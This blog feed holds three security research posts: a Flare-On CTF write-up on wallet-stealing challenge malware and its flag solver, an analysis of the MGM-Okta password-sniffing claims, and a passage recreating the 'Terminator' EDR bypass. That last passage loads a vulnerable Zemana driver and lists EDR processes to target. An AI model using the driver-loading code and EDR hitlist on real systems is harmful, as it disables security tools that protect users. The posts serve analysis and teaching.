seg000:<span class="hljs-number">0000000000000F</span>14 <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000F</span>18 <span class="hljs-number">5</span>E <span class="hljs-number">89</span> EC <span class="hljs-number">99</span>                             dd <span class="hljs-number">99</span>EC895Eh            ; kernel32.dll!CopyFileA
seg000:<span class="hljs-number">0000000000000F</span>1C D8 <span class="hljs-number">85</span> B5 EE                             dd <span class="hljs-number">0</span>EEB585D8h           ; kernel32.dll!ExpandEnvironmentStringsA
seg000:<span class="hljs-number">0000000000000F</span>20 F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000F</span>24 <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
seg000:<span class="hljs-number">0000000000000F</span>28 B8 <span class="hljs-number">12</span> DA <span class="hljs-number">00</span>                             dd <span class="hljs-number">0</span>DA12B8h             ; ntoskrnl.exe!RtlFreeHeap
</code></pre>
<p>The shellcode searches for database files and their contents (some matching a specific pattern) in <code>C:\Users\three\AppData\Roaming\Sparrow\wallets</code> and <code>C:\Users\three\AppData\Roaming\Sparrow\config</code> and copies them to the depot folder. The <code>config</code> folder contains JSON files, and recently used wallets are listed under <code>recentWalletFiles</code>. That 17-character string is the RC4 key for the next blob.</p>
<h2 id="heading-c2-forwarder">C2 Forwarder</h2>
<p>After all of the files are collected in <code>C:\depot</code>, the malware moves them to <code>C:\depot\output</code> and forwards them to <a target="_blank" href="https://bighackies.flare-on.com/stolen"><code>https://bighackies.flare-on.com/stolen</code></a>.</p>
<pre><code class="lang-c">seg000:<span class="hljs-number">0000000000000</span>CEF <span class="hljs-number">17</span> CA <span class="hljs-number">2B</span> <span class="hljs-number">6</span>E             dword_CEF       dd <span class="hljs-number">6E2</span>BCA17h            ; DATA XREF: sub_0+<span class="hljs-number">3</span>A↑o
seg000:<span class="hljs-number">0000000000000</span>CF3 FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000</span>CF7 A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000</span>CFB <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000</span>CFF <span class="hljs-number">78</span> <span class="hljs-number">59</span> <span class="hljs-number">54</span> <span class="hljs-number">23</span>                             dd <span class="hljs-number">23545978</span>h            ; kernel32.dll!FindClose
seg000:<span class="hljs-number">0000000000000</span>D03 <span class="hljs-number">65</span> C0 D6 <span class="hljs-number">63</span>                             dd <span class="hljs-number">63</span>D6C065h            ; kernel32.dll!FindFirstFileA
seg000:<span class="hljs-number">0000000000000</span>D07 <span class="hljs-number">97</span> AC E1 A5                             dd <span class="hljs-number">0</span>A5E1AC97h           ; kernel32.dll!FindNextFileA
seg000:<span class="hljs-number">0000000000000</span>D0B AD <span class="hljs-number">9B</span> <span class="hljs-number">7</span>D DF                             dd <span class="hljs-number">0</span>DF7D9BADh           ; kernel32.dll!GetFileSize
seg000:<span class="hljs-number">0000000000000</span>D0F AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
seg000:<span class="hljs-number">0000000000000</span>D13 <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000</span>D17 <span class="hljs-number">1F</span> <span class="hljs-number">79</span> <span class="hljs-number">0</span>A E8                             dd <span class="hljs-number">0E80</span>A791Fh           ; kernel32.dll!WriteFile
seg000:<span class="hljs-number">0000000000000</span>D1B F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000</span>D1F <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
seg000:<span class="hljs-number">0000000000000</span>D23 B8 <span class="hljs-number">12</span> DA <span class="hljs-number">00</span>                             dd <span class="hljs-number">0</span>DA12B8h             ; ntoskrnl.exe!RtlFreeHeap
seg000:<span class="hljs-number">0000000000000</span>D27 A4 A2 <span class="hljs-number">9F</span> ED                             dd <span class="hljs-number">0</span>ED9FA2A4h
seg000:<span class="hljs-number">0000000000000</span>D2B <span class="hljs-number">9F</span> <span class="hljs-number">76</span> DE F7                             dd <span class="hljs-number">0F</span>7DE769Fh           ; wininet.dll!HttpOpenRequestA
seg000:<span class="hljs-number">0000000000000</span>D2F FA <span class="hljs-number">45</span> <span class="hljs-number">2F</span> FB                             dd <span class="hljs-number">0F</span>B2F45FAh           ; wininet.dll!HttpQueryInfoA
seg000:<span class="hljs-number">0000000000000</span>D33 <span class="hljs-number">9</span>D BE E6 <span class="hljs-number">2</span>D                             dd <span class="hljs-number">2</span>DE6BE9Dh            ; wininet.dll!HttpSendRequestA
seg000:<span class="hljs-number">0000000000000</span>D37 C7 <span class="hljs-number">69</span> <span class="hljs-number">9B</span> FA                             dd <span class="hljs-number">0F</span>A9B69C7h           ; wininet.dll!InternetCloseHandle
seg000:<span class="hljs-number">0000000000000</span>D3B <span class="hljs-number">0</span>E E8 <span class="hljs-number">4B</span> <span class="hljs-number">1</span>E                             dd <span class="hljs-number">1E4</span>BE80Eh            ; wininet.dll!InternetConnectA
seg000:<span class="hljs-number">0000000000000</span>D3F <span class="hljs-number">29</span> <span class="hljs-number">44</span> E8 <span class="hljs-number">57</span>                             dd <span class="hljs-number">57E84429</span>h            ; wininet.dll!InternetOpenA
seg000:<span class="hljs-number">0000000000000</span>D43 <span class="hljs-number">8B</span> <span class="hljs-number">4B</span> E3 <span class="hljs-number">5F</span>                             dd <span class="hljs-number">5F</span>E34B8Bh            ; wininet.dll!InternetReadFile
</code></pre>
<p>The payload initiates contact with its C2 server, with the response from the C2 server containing CRC32 checksums for different segments of the exfiltrated data. The first four bytes of the C2 response are expected to be the CRC32 checksum of the entire exfiltrated data (<code>0...n</code>). Subsequent bytes follow a similar pattern, with each set representing the CRC32 checksum of a progressively smaller data segment.</p>
<p><code>InternetReadFile</code> is called with <code>dwNumberOfBytesToRead</code> set to 7. However, the buffer (<code>lpBuffer</code>) is expected to contain 16 bytes of data. This discrepancy suggests that the server's response likely includes four CRC32 values, corresponding to different segments of the exfiltrated data.</p>
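<p>As an illustration of that layout only: the sketch below packs four CRC32 values into a 16-byte response. The segment boundaries and the little-endian packing are placeholders of mine, since the text above only establishes that the first value covers the whole data and that later segments get smaller.</p>
<pre><code class="lang-python">import zlib


def expected_response(data, starts=(0, 1, 2, 3)):
    """Pack one CRC32 per segment data[start:] into a byte string.

    The segment starts are placeholders: the write-up only says that each
    segment is smaller than the previous one.
    """
    out = bytearray()
    for start in starts:
        # Little-endian packing is an assumption, not confirmed by the sample.
        out += zlib.crc32(data[start:]).to_bytes(4, "little")
    return bytes(out)


response = expected_response(b"example exfiltrated data")
print(len(response))  # four 4-byte checksums
</code></pre>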
<p>The next blob is XOR encrypted with a 4-byte key, where the key is calculated by multiplying <code>0x1234567</code> by the integer value in <code>lpBuffer</code>. <code>lpBuffer</code> gets its value from <code>HttpQueryInfoA</code> called with the <code>HTTP_QUERY_CONTENT_LENGTH</code> flag, which returns the size of the resource as a 32-bit number. The XOR key is then used to decrypt the next stage of the payload blob.</p>
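<p>The key derivation is small enough to write out. This sketch assumes the product is truncated to 32 bits and applied as little-endian bytes, which is how the multiplication would behave in a 32-bit register on x86. Neither detail is confirmed here, and the function names are illustrative.</p>
<pre><code class="lang-python">MULTIPLIER = 0x1234567


def xor_key_from_length(content_length):
    """Multiply and keep the low 32 bits, as a 32-bit register would."""
    product = (MULTIPLIER * content_length) % 2**32
    return product.to_bytes(4, "little")


def xor_decrypt(blob, key):
    """XOR blob with the 4-byte key, repeating the key as needed."""
    return bytes(b ^ key[i % 4] for i, b in enumerate(blob))


key = xor_key_from_length(16)  # 16 is only an example Content-Length
print(key.hex())               # 70563412
</code></pre>
<p>Since the only unknown is the Content-Length, the key can also be recovered by trying small lengths until the decrypted blob starts with the familiar marker string.</p>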
<h2 id="heading-game-check">Game Check</h2>
<p>The final blob is tied to the game and, yes, requires you to play it.</p>
<pre><code class="lang-c">seg000:<span class="hljs-number">0000000000000</span>CF8 FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000</span>CFC A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000</span>D00 <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000</span>D04 <span class="hljs-number">04</span> <span class="hljs-number">49</span> <span class="hljs-number">32</span> D3                             dd <span class="hljs-number">0</span>D3324904h           ; kernel32.dll!GetModuleHandleA
seg000:<span class="hljs-number">0000000000000</span>D08 AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
seg000:<span class="hljs-number">0000000000000</span>D0C <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000</span>D10 AC <span class="hljs-number">08</span> DA <span class="hljs-number">76</span>                             dd <span class="hljs-number">76</span>DA08ACh            ; kernel32.dll!SetFilePointer
seg000:<span class="hljs-number">0000000000000</span>D14 D8 <span class="hljs-number">85</span> B5 EE                             dd <span class="hljs-number">0</span>EEB585D8h           ; kernel32.dll!ExpandEnvironmentStringsA
seg000:<span class="hljs-number">0000000000000</span>D18 F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000</span>D1C <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
</code></pre>
<p>The final shellcode reads data from <code>C:\Program Files (x86)\Sauerbraten\packages\base\spcr2.cfg</code>, the config file for the map spcr2. It reads 4 bytes from offset 0 (<code>0xa45</code>), which is <code>maps</code>, and 8 bytes from offset 81 (<code>0xa73</code>).</p>
<pre><code class="lang-c">v0 = (*((__int64 (__fastcall **)(_QWORD))&amp;dword_CAC + <span class="hljs-number">3</span>))(<span class="hljs-number">0</span>i64);
<span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)mem_cmp(v0 + <span class="hljs-number">0x2458C0</span>, (__int64)<span class="hljs-string">"spcr"</span>, <span class="hljs-number">4u</span>i64) )
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
<span class="hljs-keyword">if</span> ( !*(_BYTE *)(v0 + <span class="hljs-number">0x2458C4</span>) )
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
sub_58A((__int64)v14, <span class="hljs-string">"%%PROGRAMFILES(X86)\\Sauerbraten\\packages\\base\\%s.cfg"</span>);
(*((<span class="hljs-keyword">void</span> (__fastcall **)(<span class="hljs-keyword">char</span> *, <span class="hljs-keyword">char</span> *, __int64))&amp;dword_CAC + <span class="hljs-number">7</span>))(v14, v15, <span class="hljs-number">1024</span>i64);
v2 = sub_6C6((__int64)v15, <span class="hljs-number">0x80000000</span>);
v3 = v2;
</code></pre>
<p>The function extracts the map data and sees if the player has achieved 1337 kills with exactly 1337 bullets in less than 5 minutes, which is very complicated to do in-game (even with an aimbot). A solution is to pull the key bytes statically and calculate the remaining key bytes with the CRC32 check to verify the correct flag value.</p>
<pre><code class="lang-python">from binascii <span class="hljs-keyword">import</span> crc32
from <span class="hljs-built_in">string</span> <span class="hljs-keyword">import</span> printable
from itertools <span class="hljs-keyword">import</span> product

# <span class="hljs-function">Read the initial part of the flag from the file
with <span class="hljs-title">open</span><span class="hljs-params">(<span class="hljs-string">"../files/spcr2.cfg"</span>, <span class="hljs-string">"rb"</span>)</span> as f:
    dd_file_offset_4 </span>= <span class="hljs-keyword">int</span>.from_bytes(f.read(<span class="hljs-number">4</span>), <span class="hljs-string">"little"</span>)
    f.seek(<span class="hljs-number">81</span>)
    initial_flag_part = f.read(<span class="hljs-number">8</span>)

# Set up the base flag
flag_base = <span class="hljs-number">25</span> * b<span class="hljs-string">"\x20"</span> + b<span class="hljs-string">"flare-on.com"</span>
flag = bytearray(flag_base)
flag[<span class="hljs-number">0</span>:<span class="hljs-number">8</span>] = initial_flag_part
flag[<span class="hljs-number">8</span>] = ord(<span class="hljs-string">"_"</span>)

# Apply XOR operations to calculate parts of the flag
def <span class="hljs-keyword">xor</span>(value, mask):
    <span class="hljs-keyword">return</span> value ^ mask

flag[<span class="hljs-number">9</span>:<span class="hljs-number">13</span>] = <span class="hljs-keyword">xor</span>(dd_file_offset_4, <span class="hljs-number">0x4203120C</span>).to_bytes(<span class="hljs-number">4</span>, <span class="hljs-string">"little"</span>)
flag[<span class="hljs-number">13</span>:<span class="hljs-number">17</span>] = <span class="hljs-keyword">xor</span>(dd_file_offset_4, <span class="hljs-number">0x1715151E</span>).to_bytes(<span class="hljs-number">4</span>, <span class="hljs-string">"little"</span>)
flag[<span class="hljs-number">17</span>:<span class="hljs-number">21</span>] = <span class="hljs-keyword">xor</span>(dd_file_offset_4, <span class="hljs-number">0x15040232</span>).to_bytes(<span class="hljs-number">4</span>, <span class="hljs-string">"little"</span>)
flag[<span class="hljs-number">24</span>] = ord(<span class="hljs-string">"@"</span>)

# Brute-force the remaining characters
<span class="hljs-keyword">for</span> i in product(printable, repeat=<span class="hljs-number">3</span>):
    flag[<span class="hljs-number">21</span>:<span class="hljs-number">24</span>] = [ord(c) <span class="hljs-keyword">for</span> c in i]
    <span class="hljs-keyword">if</span> crc32(flag[:<span class="hljs-number">25</span>]) == <span class="hljs-number">0xA5561586</span>:
        print(f<span class="hljs-string">"Flag: {flag.decode('UTF-8')}"</span>)
        <span class="hljs-keyword">break</span>
<span class="hljs-keyword">else</span>:
    print(<span class="hljs-string">"Failed bruting the CRC32 check!"</span>)
</code></pre>
<pre><code class="lang-c">&gt; python solve.py
Flag: computer_ass1sted_ctfing@flare-on.com
</code></pre>
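<p>As a sanity check on the XOR step, here is a minimal sketch that needs no game files. It assumes only what is stated above, namely that the first four bytes of <code>spcr2.cfg</code> are <code>maps</code>, and it treats the constants <code>0x4203120C</code>, <code>0x1715151E</code> and <code>0x15040232</code> from the solver as little-endian dword masks. The helper name <code>xor_dword</code> is made up for illustration.</p>

```python
# The first dword of spcr2.cfg, per the write-up above.
seed = int.from_bytes(b"maps", "little")


def xor_dword(value: int, mask: int) -> bytes:
    """XOR two 32-bit values and return the result as 4 little-endian bytes."""
    return ((value ^ mask) & 0xFFFFFFFF).to_bytes(4, "little")


# Masks for flag offsets 9, 13 and 17, in that order.
masks = [0x4203120C, 0x1715151E, 0x15040232]
middle = b"".join(xor_dword(seed, m) for m in masks)
print(middle.decode())  # ass1sted_ctf
```

<p>Each mask has to be applied as a full dword. Masking the result down to a single byte would only ever recover the first character of each group.</p>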
<p>Why did I do this? I don't know. Will I do it again? Probably not. But alas, the reason why I don't usually do CTFs.</p>
]]></content:encoded></item><item><title><![CDATA[Second Guessing the MGM-Okta Hack]]></title><description><![CDATA[Cover Illustration by mocapoca_

A lot of fuss has been made about the ALPHV/Blackcat hack against MGM Resorts, where they said that they exploited MGM's Okta Agent to sniff for passwords, gaining super administrator privileges to MGM's Okta account ...]]></description><link>https://research.meekolab.com/second-guessing-the-mgm-okta-hack</link><guid isPermaLink="true">https://research.meekolab.com/second-guessing-the-mgm-okta-hack</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sun, 17 Sep 2023 17:03:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1694970281317/3170928c-f848-4792-967f-7d0af28c0067.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by mocapoca_</em></strong></p>
</blockquote>
<p>A lot of fuss has been made about the ALPHV/Blackcat hack against MGM Resorts, in which the attackers said that they exploited MGM's <a target="_blank" href="https://www.darkreading.com/application-security/okta-flaw-involved-mgm-resorts-breach-attackers-claim">Okta Agent</a> to sniff for passwords, gaining super administrator privileges to MGM's Okta account and escalating their attack to Global Administrator privileges on their <a target="_blank" href="https://learn.microsoft.com/en-us/azure/active-directory/develop/quickstart-create-new-tenant">Azure Active Directory Tenant</a>.</p>
<p>Specifically, they outlined that:</p>
<blockquote>
<p>MGM made the hasty decision to shut down each and every one of their Okta Sync servers after learning we had been lurking on their Okta Agent servers sniffing passwords of people whose passwords couldn't be cracked from their domain controller hash dumps.</p>
</blockquote>
<p>This leads to some very interesting questions:</p>
<ol>
<li><p>What did they mean by "sniffing passwords of people whose passwords couldn't be cracked"?</p>
</li>
<li><p>What role did Okta Sync servers play in breaching MGM's active directory?</p>
</li>
</ol>
<h2 id="heading-3rd-party-identity-providers-and-ad">3rd Party Identity Providers and AD</h2>
<p>We know that Okta, like other IdP vendors such as Jumpcloud, has integrations with Microsoft Active Directory for both <a target="_blank" href="https://www.okta.com/integrations/active-directory/">On-prem AD</a> and <a target="_blank" href="https://help.okta.com/en-us/content/topics/provisioning/azure/azure-integrate-main.htm">Azure-based Cloud AD</a>. While these companies usually tout that their solutions can replace <a target="_blank" href="https://www.okta.com/sites/default/files/2020-07/The%20Benefits%20of%20Migrating%20from%20ADFS%20to%20Okta%20White%20Paper_Updated_0.pdf">Active Directory</a>, sometimes migrating away from Active Directory as a <a target="_blank" href="https://www.okta.com/integrations/active-directory/">single source of truth</a> for user management can be a pain in the ass especially if you operate a large workforce.</p>
<p>Okta also supports application-level password synchronization, which lets it sync an Okta password to certain third-party applications. This also works with Active Directory and LDAP, as outlined in this <a target="_blank" href="https://help.okta.com/en-us/content/topics/directory/password-sync-application.htm">documentation</a>:</p>
<blockquote>
<p>If you have configured Okta to use delegated authentication with Active Directory (AD) or LDAP, the password used to sign in to Okta is the Active Directory or LDAP password. Okta uses the application API to synchronize the Active Directory or LDAP password to the application. The password is stored as the application password.</p>
</blockquote>
<p>Okta Agent connections use port 443 for AD and port 636 for LDAP. Both are secured using SSL: the agent validates the Okta server's SSL certificate and mutually authenticates with the Domain Controller using a limited read-only integration account created on the DC during the agent install process, according to this <a target="_blank" href="https://www.okta.com/sg/resources/whitepaper/ad-architecture/">document</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1694872354020/9ad065ab-f8ad-491c-9134-fdd734cc04bb.png" alt class="image--center mx-auto" /></p>
<p>Many were quick to assume that either Okta was storing the passwords in cleartext or that ALPHV had magically found a way to decipher TLS connections, either of which would have massive implications. But I think the explanation is far simpler than this.</p>
<p>Okta is not a small company, but a massive IdP vendor. I think if they were transferring passwords from AD to the agent, someone would've sniffed the packets and reported it publicly. And I'm pretty sure the ones behind ALPHV don't have access to Project <a target="_blank" href="https://archive.nytimes.com/www.nytimes.com/interactive/2013/09/05/us/documents-reveal-nsa-campaign-against-encryption.html?_r=0">BULLRUN</a>.</p>
<h2 id="heading-delegated-authentication">Delegated Authentication</h2>
<p>Okta's AD synchronization feature syncs users to Okta and enables <a target="_blank" href="https://help.okta.com/en-us/content/topics/security/security_authentication.htm">Delegated Authentication</a>. So basically, when you enter your password in Okta, it gets put in a queue and the agent grabs it and authenticates on your behalf to AD. The password gets encrypted when put in the queue and then the agent decrypts it on-premises (or they can just purely rely on TLS), but it will use the cleartext to authenticate to AD, as the Microsoft API works that way. You can replicate this easily via PowerShell:</p>
<pre><code class="lang-powershell"><span class="hljs-keyword">param</span>(
    [<span class="hljs-built_in">string</span>]<span class="hljs-variable">$Username</span>,
    [<span class="hljs-built_in">string</span>]<span class="hljs-variable">$Password</span>,
    [<span class="hljs-built_in">string</span>]<span class="hljs-variable">$Domain</span>
)

<span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-AssemblyName</span> <span class="hljs-string">"System.DirectoryServices.AccountManagement"</span>

<span class="hljs-comment"># Create a context to the Active Directory</span>
<span class="hljs-variable">$Context</span> = <span class="hljs-built_in">New-Object</span> System.DirectoryServices.AccountManagement.PrincipalContext([<span class="hljs-type">System.DirectoryServices.AccountManagement.ContextType</span>]::Domain, <span class="hljs-variable">$Domain</span>)

<span class="hljs-comment"># Validate the credentials</span>
<span class="hljs-variable">$IsValid</span> = <span class="hljs-variable">$Context</span>.ValidateCredentials(<span class="hljs-variable">$Username</span>, <span class="hljs-variable">$Password</span>)

<span class="hljs-keyword">if</span> (<span class="hljs-variable">$IsValid</span>) {
    <span class="hljs-built_in">Write-Host</span> <span class="hljs-string">"The credentials are valid."</span>
}
<span class="hljs-keyword">else</span> {
    <span class="hljs-built_in">Write-Host</span> <span class="hljs-string">"The credentials are not valid."</span>
}
</code></pre>
<p>It's possible that they injected a DLL to hook the function obtaining data from Okta. This can occur post-TLS decryption, letting them sniff the data in the agent. Then, the Okta Agent employs a Windows API function to update the user's domain details, using the native API to generate a hash and input it into the active directory domain.</p>
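<p>To make the reasoning concrete, here is a toy model of that flow. It is a sketch under loud assumptions, not Okta's implementation: <code>toy_cipher</code> is a throwaway XOR stream standing in for whatever protects the password in transit, <code>DIRECTORY</code> and <code>validate_credentials</code> are hypothetical stand-ins for the DC and the validation call, and <code>hooked</code> models code sitting in front of that call inside the agent process.</p>

```python
import hashlib
import secrets


def toy_cipher(key: bytes, data: bytes) -> bytes:
    """Toy XOR stream (SHA-256 in counter mode). NOT real crypto; it only
    stands in for whatever protects the password between cloud and agent."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream.extend(hashlib.sha256(key + counter.to_bytes(4, "big")).digest())
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


# Hypothetical directory: it only keeps a hash of each password.
DIRECTORY = {"alice": hashlib.sha256(b"correct horse").hexdigest()}


def validate_credentials(username: str, password: str) -> bool:
    """Stand-in for the AD validation call: it takes the plaintext as input."""
    return DIRECTORY.get(username) == hashlib.sha256(password.encode()).hexdigest()


observed = []  # what code placed in front of validate_credentials gets to see


def hooked(func):
    def wrapper(username, password):
        observed.append((username, password))  # plaintext is visible here
        return func(username, password)
    return wrapper


def agent_handle(key: bytes, username: str, blob: bytes, validate) -> bool:
    """Agent side: decrypt the queued blob, then authenticate with the plaintext."""
    password = toy_cipher(key, blob).decode()
    return validate(username, password)


key = secrets.token_bytes(32)
queued = toy_cipher(key, b"correct horse")  # cloud side: encrypted in the queue
ok = agent_handle(key, "alice", queued, hooked(validate_credentials))
print(ok, observed)
```

<p>The queue entry never holds the cleartext and the directory only holds a hash, yet the password still exists in plain form for a moment inside the agent. Neither cleartext storage nor broken TLS is needed for someone living in that process to read it.</p>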
<h2 id="heading-insecure-by-design">Insecure by Design</h2>
<p>Okta has made security trade-offs to cater to large enterprises, which isn't necessarily an uncommon thing. By enabling integration with Active Directory, however, Okta has inherited the security weaknesses that come with AD environments.</p>
<p>Active Directory in corporate networks is one of the leading providers of tech debt, and honestly, new corporations should steer clear of it if possible.</p>
<p>In the functioning of Active Directory (AD), domain-connected computers necessitate the exposure of certain firewall ports to facilitate essential communications and operations. However, this comes with the risk of opening potential gateways for unauthorized entries.</p>
<p>Group Policy Objects (GPOs), which Active Directory uses for central management of network computers, give an attacker who gains control of them the ability to dictate policy across the network. Additionally, the local caching of credentials, a common practice in Windows systems integrated with AD, can be another access point for attackers to extract vital credentials and facilitate lateral movement across the network.</p>
<p>Active Directory is also a repository of valuable network information, including intricate details about users, groups, and computers, which can turn into a gold mine for attackers.</p>
<p>Service Principal Names (SPNs), indicative of the services running on the network, can also be scanned to locate high-value targets, providing attackers with a blueprint to orchestrate well-planned attacks.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1694884460074/8e73403f-d018-4fe1-b16d-d20eaf023869.png" alt class="image--center mx-auto" /></p>
<p>AD’s support for older protocols and technologies, albeit to maintain compatibility with outdated systems, creates several security challenges. The continued support for the less secure NTLM alongside Kerberos is one such example. This support enlarges the scope for attackers, offering them opportunities to exploit known vulnerabilities in NTLM.</p>
<p>The shift towards a SaaS-first IdP system is increasingly recognized as a robust strategy to enhance security, with SSO and SCIM (System for Cross-domain Identity Management) allowing systems to offer seamless experiences without inheriting the vulnerabilities prevalent in traditional Active Directory environments.</p>
]]></content:encoded></item><item><title><![CDATA[Recreating the RAMP Forum EDR Bypass]]></title><description><![CDATA[Cover Illustration by mocapoca_

Last month, a guy named spyboy began advertising an EDR evasion tool for the Windows operating system via the Russian-language forum RAMP. The author claims that the software, called “Terminator”, can bypass leading E...]]></description><link>https://research.meekolab.com/recreating-the-ramp-forum-edr-bypass</link><guid isPermaLink="true">https://research.meekolab.com/recreating-the-ramp-forum-edr-bypass</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 05 Jul 2023 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1687669141971/ae61f675-116c-48e0-8f76-9ec2873cbdef.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><em>Cover Illustration by mocapoca_</em></p>
</blockquote>
<p>Last month, a guy named <code>spyboy</code> began advertising an EDR evasion tool for the Windows operating system via the Russian-language forum RAMP. The author claims that the software, called “Terminator”, can bypass leading EDR/AV with the software being sold from $300 for the bypass of a single EDR solution and up to $3,000 for the targeting of all EDR solutions listed.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1685809995801/9d82b927-902f-4240-86f3-d30674f4917f.png" alt class="image--center mx-auto" /></p>
<p>While Twitter had a meltdown for a total of two days, insight from Crowdstrike that was <a target="_blank" href="https://www.reddit.com/r/crowdstrike/comments/13wjrgn/20230531_situational_awareness_spyboy_defense/">shared</a> on Reddit revealed that Terminator is less sophisticated than the entire infosec community initially thought.</p>
<p>The tool drops a signed Zemana Anti-Malware kernel driver (zamguard64.sys or zam64.sys) into the <code>C:\Windows\System32</code> folder under a randomly generated name of 4 to 10 characters. Both of these drivers have a history of exploitation, first showing up as <a target="_blank" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-31728">CVE-2021-31728</a>, a flaw inside MalwareFox Anti-Malware (a rebrand of Zemana Anti-Malware) that allows a non-privileged process to manipulate the driver and gain Ring 0 privileges. The interesting IOCTL calls can be found in this <a target="_blank" href="https://gist.github.com/hfiref0x/e116dcf7e99b8d5d36c333a1f1048916">gist</a>.</p>
<p>First, we need to load the driver by opening a handle to the Windows Service Control Manager (SCM) database and starting the Zemana Anti-Malware service (zam64.sys).</p>
<pre><code class="lang-cpp"><span class="hljs-function">BOOL <span class="hljs-title">loadDriver</span><span class="hljs-params">(<span class="hljs-keyword">char</span>* driverPath)</span> </span>{
    SC_HANDLE hSCM = OpenSCManager(<span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, SC_MANAGER_ALL_ACCESS);
    <span class="hljs-keyword">if</span> (!hSCM) <span class="hljs-keyword">return</span> FALSE;

    SC_HANDLE hService = OpenServiceA(hSCM, g_serviceName, SERVICE_ALL_ACCESS);
    <span class="hljs-keyword">if</span> (hService) {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Service already exists.\n"</span>);
        SERVICE_STATUS serviceStatus;
        <span class="hljs-keyword">if</span> (QueryServiceStatus(hService, &amp;serviceStatus) &amp;&amp; serviceStatus.dwCurrentState == SERVICE_STOPPED) {
            <span class="hljs-keyword">if</span> (!StartServiceA(hService, <span class="hljs-number">0</span>, <span class="hljs-literal">nullptr</span>)) {
                CloseServiceHandle(hService);
                CloseServiceHandle(hSCM);
                <span class="hljs-keyword">return</span> FALSE;
            }
            <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Starting service...\n"</span>);
        }
        CloseServiceHandle(hService);
    }
</code></pre>
<p>We can then define a hitlist of EDR processes we wanna target and search for them.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* <span class="hljs-keyword">const</span> g_edrlist[] = {
    <span class="hljs-string">"activeconsole"</span>, <span class="hljs-string">"anti malware"</span>,    <span class="hljs-string">"anti-malware"</span>,
    <span class="hljs-string">"antimalware"</span>,   <span class="hljs-string">"anti virus"</span>,      <span class="hljs-string">"anti-virus"</span>,
    <span class="hljs-string">"antivirus"</span>,     <span class="hljs-string">"appsense"</span>,        <span class="hljs-string">"authtap"</span>,
    <span class="hljs-string">"avast"</span>,         <span class="hljs-string">"avecto"</span>,          <span class="hljs-string">"canary"</span>,
    <span class="hljs-string">"carbonblack"</span>,   <span class="hljs-string">"carbon black"</span>,    <span class="hljs-string">"cb.exe"</span>,
